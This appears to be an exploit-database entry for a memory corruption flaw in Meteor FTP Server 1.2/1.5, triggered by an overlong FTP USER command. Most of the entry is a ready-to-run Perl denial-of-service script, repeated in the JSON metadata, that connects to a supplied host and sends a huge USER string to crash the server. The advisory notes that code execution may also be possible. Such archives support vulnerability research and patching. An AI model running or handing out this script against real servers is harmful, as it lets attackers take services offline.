Search...

Meteor FTP Server 1.2/1.5 USER Memory Corruption Vulnerability

2014-07-01T00:00:00

ID SSV:76784
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/8376/info

Meteor FTP Server is prone to a memory corruption vulnerability that can be triggered by a malicious client via an overly value for the FTP USER command. This could be exploited to cause a server crash.

Further reports indicate that this may likely also be exploited to execute arbitrary code in the context of the affected server.

#!/usr/bin/perl
#
# meteordos.pl - Remote denial of service against Meteor FTP Version 1.5
#
# A vulnerability has been identified in Meteor FTP Version 1.5, which
# allows malicious users to remotely crash the ftpd. By connecting to the 
# ftpd and issuing USER followed by large amounts of data, the server 
# crashes. For more info, go to : 
# http://www.evicted.org/projects/writings/mftpadvisory.txt
# 
# Usage : ./meteordos.pl &#60;host/ip&#62;
#
# Vulnerability & code by zerash
# Contact : zerash@evicted.org

use Net::FTP;
$host = $ARGV[0];

if(&#34;$ARGV[0]&#34; eq &#34;&#34;) {
	print(&#34;DoS against Meteor FTP Version 1.5 by zerash\@evicted.org\n&#34;);
	die(&#34;Usage : ./meteorftpdos &#60;host\/ip&#62;\n&#34;);
} else {	
	
	print(&#34;Connecting to $host...\n&#34;);
	my $ftp = Net::FTP-&#62;new($host) or die &#34;Couldn&#39;t connect to $host\n&#34;;
	print(&#34;Connected!\n&#34;);
	print(&#34;Attempting to exploit the ftpd...&#34;);
	$ftp-&#62;login(&#39;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%&#39;);
	$ftp-&#62;quit;
	print(&#34;Success!\n&#34;);
}

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-76784", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Meteor FTP Server 1.2/1.5 USER Memory Corruption Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-76784", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n source: http://www.securityfocus.com/bid/8376/info\r\n\r\nMeteor FTP Server is prone to a memory corruption vulnerability that can be triggered by a malicious client via an overly value for the FTP USER command. This could be exploited to cause a server crash.\r\n\r\nFurther reports indicate that this may likely also be exploited to execute arbitrary code in the context of the affected server.\r\n\r\n#!/usr/bin/perl\r\n#\r\n# meteordos.pl - Remote denial of service against Meteor FTP Version 1.5\r\n#\r\n# A vulnerability has been identified in Meteor FTP Version 1.5, which\r\n# allows malicious users to remotely crash the ftpd. By connecting to the \r\n# ftpd and issuing USER followed by large amounts of data, the server \r\n# crashes. For more info, go to : \r\n# http://www.evicted.org/projects/writings/mftpadvisory.txt\r\n# \r\n# Usage : ./meteordos.pl <host/ip>\r\n#\r\n# Vulnerability & code by zerash\r\n# Contact : zerash@evicted.org\r\n\r\nuse Net::FTP;\r\n$host = $ARGV[0];\r\n\r\nif("$ARGV[0]" eq "") {\r\n\tprint("DoS against Meteor FTP Version 1.5 by zerash\\@evicted.org\\n");\r\n\tdie("Usage : ./meteorftpdos <host\\/ip>\\n");\r\n} else {\t\r\n\t\r\n\tprint("Connecting to $host...\\n");\r\n\tmy $ftp = Net::FTP->new($host) or die "Couldn't connect to $host\\n";\r\n\tprint("Connected!\\n");\r\n\tprint("Attempting to exploit the ftpd...");\r\n\t$ftp->login('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%');\r\n\t$ftp->quit;\r\n\tprint("Success!\\n");\r\n}\r\n\n ", "id": "SSV:76784", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T17:10:29", "reporter": "Root", "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2017-11-19T17:10:29", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T17:10:29", "rev": 2}, "vulnersScore": 0.3}, "references": []}